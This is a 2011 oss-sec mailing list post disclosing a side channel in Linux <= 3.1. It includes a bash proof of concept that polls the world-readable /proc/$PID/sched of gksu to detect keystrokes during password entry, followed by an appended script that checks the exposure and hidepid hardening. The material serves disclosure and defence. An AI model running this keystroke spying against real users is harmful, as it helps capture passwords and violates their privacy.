oss-sec mailing list archives
/proc/$PID/sched PoC: spy-gksu
From: Vasiliy Kulikov <segooon () gmail com>
Date: Sat, 5 Nov 2011 14:47:36 +0400
#!/bin/bash
#
# A PoC for spying on keystrokes in gksu in Linux <= 3.1.
#
# /proc/$PID/{sched,schedstat} are world readable, so we can just loop
# on one CPU core while the victim is executed on another, and spy on
# the changes of scheduling counters. The PoC counts only the number of
# keystrokes, but it can be easily extended to note the delays between the
# keystrokes and do the statistical analysis to learn the input characters.
# See e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on
# Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang.
#
# It is NOT stable, it only shows a design flaw (the lack of a proper
# permission model for procfs debugging counters). The constants are true
# for the author's system only and don't take into account other sources of
# gksu CPU activity.
#
# by segoon from openwall
#
# run as: spy-sched gksu

PNAME="$1"

# Wait until a process with the given name shows up, then enter its procfs dir.
while :; do
    PID=`pgrep "$PNAME"`
    if [ -n "$PID" ]; then
        echo $PID
        cd /proc/$PID/
        break
    fi
    sleep 1
done

# Poll se.exec_start and classify each change by the size of the jump.
S=0.0
while :; do
    V=`grep se.exec_start sched 2>/dev/null | cut -d: -f2-`
    [ -z "$V" ] && break    # sched file gone: the process has exited
    if [ "$V" != "$S" ]; then
        VAL=`echo "$V - $S" | bc -l`
        VALI=`echo $VAL | cut -d. -f1`
        [ -z "$VALI" ] && VALI=0
        if [ "$VALI" -le 815 -a "$VALI" -ge 785 ]; then
            # Cursor appeared
            :
        elif [ "$VALI" -le 415 -a "$VALI" -ge 385 ]; then
            # Cursor disappeared
            :
        elif [ "$VALI" -ge 150 ]; then
            echo "$VAL (KEY PRESSED)"
        else
            echo "$VAL"
        fi
        S=$V
    fi
done
--
Vasiliy Kulikov
http://www.openwall.com - bringing security into open computing environments
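A defender-side check, added here and not part of the post above: it reports whether the precondition the PoC depends on holds on a host, i.e. whether /proc/$PID/sched is readable by every local user and whether /proc is mounted with a hidepid= option (added in Linux 3.3) that hides other users' /proc/$PID entries. The function names, the --live switch and the sample mount lines are constructed for this example.

```shell
#!/bin/sh
# Added example (not the original post's code): check the exposure of the
# scheduler counters that the spy-gksu PoC polls.

# Exit 0 when an octal mode string such as "444" or "0444" grants read
# permission to "other", i.e. any local user can poll the counters.
mode_world_readable() {
    last=$(printf '%s' "$1" | tail -c 1)
    case "$last" in
        4|5|6|7) return 0 ;;
        *)       return 1 ;;
    esac
}

# Print the hidepid= value from a /proc/mounts style line describing /proc.
# "0" means every user sees every /proc/$PID (the default, and what the PoC
# needs); "1"/"2" (or "invisible" on newer kernels) restrict that view.
proc_hidepid_option() {
    opts=$(printf '%s\n' "$1" | awk '$2 == "/proc" { print $4 }')
    val=$(printf '%s\n' "$opts" | tr ',' '\n' | sed -n 's/^hidepid=//p' | head -n 1)
    printf '%s\n' "${val:-0}"
}

# Inspect the running host (GNU stat assumed); only run with --live so the
# functions above can also be exercised on the constructed input below.
live_check() {
    mode=$(stat -c '%a' /proc/self/sched 2>/dev/null) || {
        echo "no /proc/self/sched here (CONFIG_SCHED_DEBUG off?)"; return; }
    if mode_world_readable "$mode"; then
        echo "/proc/\$PID/sched mode $mode: readable by all local users"
    else
        echo "/proc/\$PID/sched mode $mode: not world readable"
    fi
    line=$(awk '$2 == "/proc" { print; exit }' /proc/mounts)
    echo "/proc mounted with hidepid=$(proc_hidepid_option "$line")"
}

# Constructed sample /proc/mounts lines: a default mount and a hardened one.
SAMPLE_DEFAULT='proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0'
SAMPLE_HARDENED='proc /proc proc rw,nosuid,nodev,noexec,relatime,hidepid=2 0 0'

if [ "${1:-}" = "--live" ]; then
    live_check
fi
```

Run it as `sh check-sched-exposure.sh --live`; a world-readable mode together with hidepid=0 is the combination the PoC exploits, and remounting /proc with hidepid=2 removes the cross-user view of the counters without touching the file modes.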